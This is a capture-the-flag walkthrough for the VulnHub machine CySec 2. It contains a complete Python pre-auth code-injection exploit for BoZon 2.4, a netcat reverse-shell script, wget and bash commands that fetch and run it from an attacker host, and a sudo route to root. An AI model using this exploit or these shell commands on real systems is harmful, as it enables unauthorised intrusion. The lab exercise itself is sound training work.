VulnHub: CySec: 2
Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open -- open 192.168.0.11522/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b1:00:57:62:be:65:42:f0:ba:3e:c1:47:c5:8d:fb:db (RSA)
| 256 5a:9b:20:89:19:c3:ab:d4:be:06:84:de:e4:30:d4:37 (ECDSA)
|_ 256 08:4b:f3:f8:88:7e:1a:6b:e1:8d:7f:14:60:10:7a:98 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
- Web
When we look at the source of the page, we see a sentence in encrypted form. Let’s decode it with CyberChef.
view-source:http://192.168.0.115/
Zm9yIGZpcnN0IGZsYWcgY2hlY2sgL2NoYWxsZW5nZS9pbmRleC5waHAKZm9yIHNlY29uZCBmbGFnIGNoZWNrIC9FeG9saXQvaW5kZXgucGhwfor first flag check /challenge/index.php
for second flag check /Exolit/index.phpWhen we look at /Exolit/index.php, we see that BoZon is version 2.4. After searching, we found the exploit.
- Exploit
import urllib,urllib2,time
#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit
#Discovery / credits: John Page - Hyp3rlinx/Apparition
#hyp3rlinx.altervista.org
#Exploit: add user account | run phpinfo() command
#=========================================================
EXPLOIT=0
IP=raw_input("[Bozon IP]>")
EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()"))
if EXPLOIT==1:
CMD="Apparition"
else:
CMD='"];$PWN=''phpinfo();//''//"'
if EXPLOIT != 0:
url = 'http://'+IP+'/Exolit/index.php'
data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''})
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
if EXPLOIT==1:
print 'Apparition user account created! password: abc123'
else:
print "Done!... waiting for phpinfo"
time.sleep(0.5)
print response.read()If we launch the operation, we must first register. So let’s select 1, create a user and log in
└─$ python2 exploit.py
[Bozon IP]>192.168.0.115
[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()1
Apparition user account created! password: abc123Let’s enter.
username: Apparition
password: abc123When we refresh the page after selecting the second operation, we encounter such a page.
This is the command that does this.
CMD='"];$PWN=''phpinfo();//''//"'Let’s use it.
CMD='"];system("ls -la");//''//"'After changing this section, restart exploit and select the 2nd one. Then refresh the page.
The code has been executed
“You can contact me if you have any questions.”
- Reverse shell
Let’s prepare such a useful load called reverse.sh
#!/bin/bash
nc -e /bin/sh YourİP 1234Now let’s load it on the other side
Local machine
Command: python3 -m http.server 80
In exploit
CMD='"];system("wget http://YourIP/reverse.sh");//''//"'CMD='"];system("bash reverse.sh");//''//"'
Local machine
nc -nvlp 1234After listening, let’s refresh the page and get the shell.
- CySec2
If we look at the flag.txt file, we can find the password for cysec2.
Command: cat flag.txt
username = cysec2
password = $^WAhuy457i6kjCommand: su cysec2
- Root
Check privileges
Command: sudo -l
(ALL : ALL) ALLCommand: sudo su
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
